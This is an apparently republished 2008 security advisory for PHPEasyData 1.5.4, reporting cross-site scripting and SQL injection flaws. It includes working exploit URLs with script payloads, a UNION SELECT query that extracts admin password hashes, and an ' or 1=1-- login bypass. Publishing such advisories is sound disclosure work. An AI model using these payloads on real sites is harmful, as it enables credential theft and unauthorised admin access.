PHPEasyData 1.5.4 Multiple Vulnerabilities

2008.07.05
Risk: High
Local: No
Remote: Yes
CWE: CWE-79
CWE-89

------------- *PHPEasyData* ------------- Informations : ************** Langage : PHP Version : 1.5.4 Website : http://www.phpeasydata.com/ Problems : Multiple vulnerabilities Description: ************ PHPEasyData is a PHP application which allow you to manage and display on the web your dynamics data and directories. Details : ********* --------- ** Xss ** --------- There are multiple xss vulnerabilities. Demonstration exploit URL: -last_records.php: http://[website]/last_records.php?annuaire=%3Cscript%3Ealert(document.co okie)%3C/script%3E -annuaire.php: http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=&by=%3Cscr ipt%3Ealert(document.cookie)%3C/script%3E http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=%3Cscript% 3Ealert(document.cookie)%3C/script%3E http://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.cookie )%3C/script%3E ------------------- ** SQL Injection ** ------------------- -annuaire.php http://[website]/annuaire.php?annuaire=29%20union%20select%20user_pass,u ser_login,user_fname,user_access%20from%20an_users With this url we can have the admin password(crypted with md5) for example. -admin/login.php Due to a lack of sanitization of the user input in admin/login.php we can easily get an access to the admin control panel with the login: ' or 1=1-- /** Credits: ******** Autor : Sylvain THUAL E-mail : contact (at) click-internet (dot) fr [email concealed] Website : http://www.click-internet.fr

References:

http://xforce.iss.net/xforce/xfdb/42997
http://www.securityfocus.com/bid/29659
http://www.securityfocus.com/archive/1/archive/1/493273/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top